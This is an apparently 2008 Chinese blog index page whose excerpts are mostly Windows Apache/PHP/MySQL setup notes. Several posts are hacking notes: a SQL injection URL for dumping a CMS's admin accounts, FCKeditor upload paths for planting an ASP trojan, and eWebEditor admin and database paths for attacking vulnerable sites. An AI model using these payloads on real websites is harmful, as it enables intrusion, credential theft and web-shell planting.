百度首页 | 百度空间
 
文章列表
 
2008-10-05 01:48

先注册一个用户。

注册地址:
/member/index_do.php?fmdo=user&dopost=regnew

爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5

类别:Cms Shell | 评论(0) | 浏览()
 
2008-10-04 16:44

前边没用Zend,今天找了个加密过程文件需要用到它才能运行,于是到官网上下了最新版ZendOptimizer-3.3.0a-Windows-i386.exe。 正常安装后,运行info.php看Zend写入信息,只写出上三行无下俩行版本号,证明有问题没成功!!!

于是打开WINDOWS/PHP.INI 文件 ,拉到最后看到如下:

zend_extension_ts="C:\Webserver\Zend\lib\Optimizer-3.3.0\ZendOptimizer.dll"
zend_extension_manager.optimizer_ts="C:\Webserver\Zend\lib\Optimizer-3.3.0"

看到

类别:经验分享 | 评论(0) | 浏览()
 
2008-10-03 02:12

刚才看到DZ论坛网友nLeXeR发的对于viewthread.htm的改进意见,感觉不错,如果官方不改,以后自己慢慢的摸索改。以下是意见全文:进了DZ论坛,就像进了一个大观园,满页的可点击的地方,满页的各种功能,大部分可以去掉,可以简化,可以改进!DZ完全没有人性化,新人进来了都不知道干啥。

我的改进意见是,去掉不用的功能,改进需保留的功能,所有词汇傻瓜化,让每一个上网初学者都能看懂。

我从上往下一说吧,就现在这个帖子。

最上面是LOGO,BANNER,这个最重要,是网站就有

接下来是登陆注销资料

类别:web2.0 | 评论(0) | 浏览()
 
2008-09-24 02:53

ExpressionEngine 我认为是国外CMS中的精品,基于CodeIgniter框架开发

不说别的,就后台来说,没有哪个CMS比ExpressionEngine 漂亮好用

目前ExpressionEngine 最新版本是1.6.3 新版本2.0即将发布

下载ExpressionEgine1.6.3

==========================================

类别:web2.0 | 评论(0) | 浏览()
 
2008-09-23 00:58
    今天看了一下用Perl写cgi的教程,于是想测试一下成果,于是,开始了安装配置全过程.

    因为,以前做的是php开发,apache已安装成功,并运行正常(安装路径:E:/webserver/Apache2),所以,在此对apache2的安装就不多做说明.
    在此着重说明perl的安装过程及在apache下的配置.

   1, 下载windows环境下的ActivePerl For Windows V5.8.8.820(
类别:经验分享 | 评论(0) | 浏览()
 
2008-09-23 00:54
先从网站上下载APACHE2.2.3 Mysql 5.0.22 PHP 5.2.0
假设:系统盘为 c:/
假设:安装好后目录状态会是这样子:
apache--> C:\Program Files\Apache Software Foundation\Apache2.2
mysql-->C:\Program Files\MySQL\MySQL Server 5.0
php--> c:/php

准备工作:
安装之前需要检查80端口、3306端口是否被其它程序占用,如果有,则需要删除相应的软件
-------------------------------------
第一步安装mysql
类别:经验分享 | 评论(0) | 浏览()
 
2008-09-22 23:44

下面的是MySQL安装的图解,用的可执行文件安装的,详细说明了一下!

打开下载的mysql安装文件mysql-5.0.27-win32.zip,双击解压缩,运行“setup.exe”,出现如下界面:

  mysql安装向导启动,按“Next”继续

类别:经验分享 | 评论(0) | 浏览()
 
2008-09-22 22:28
使用手记
一、使用软件:
apache_2.0.52-win32-x86-no_ssl  
php-5.0.2-Win32
mysql-4.0.21-win
phpMyAdmin-2.6.0
配置环境:Windows Xp sp2
二、具体步骤
注意事项:安装过程,任何目录和文件名都不要使用空格,
不要使用D:\Program Files 而要使用D:\ProgramFiles
1. apache_2.0.52-win32-x86-no_ssl  
apache服务器软件,我下载的是win版本,2.0系列的配置都是相似的。
双击安装apache2.0.52,我把它安装到D:\ApacheGroup 注意,目录名不要包含
类别:经验分享 | 评论(0) | 浏览()
 
2008-09-16 17:13

fckeditor漏洞利用:


fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

可以自定义文件夹名称上传图片木马,利用2003路径解析漏洞,也可以直接上传ASP木马。

如果是ASPX的就将/asp/connector.asp后缀改为ASPX

Type=Image这个变量是我们自己定义的。比如:

fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp

这时候我们就创建了一个名为xi

类别:技术文章 | 评论(0) | 浏览()
 
2008-09-16 17:10
有eWebEditor漏洞的站还很多,平时经常碰到,有时想搞一下总忘记几个关键文件的名称和路径。
       今天抽点时间写在这里,做个记号,以后再碰到就好找了.

文件名称及路径:
Admin_Login.asp     登录页面
Admin_Default.asp   管理首页
Admin_Style.asp
Admin_UploadFile.asp
Upload.asp
Admin_ModiPwd.asp
eWebEditor.asp

db/ewebeditor.mdb   默认数据库路径

    
类别:技术文章 | 评论(0) | 浏览()
 
     
 
 
文章分类
 
 
 
Code(4)
 
 
 
 
 
     
 
文章存档
 
 
 
 
 
 
 
     
 
最新文章评论
   

经验老道,高手啊!谢谢了
 

ok ilove you very much
 

谢谢!
 
     


©2008 Baidu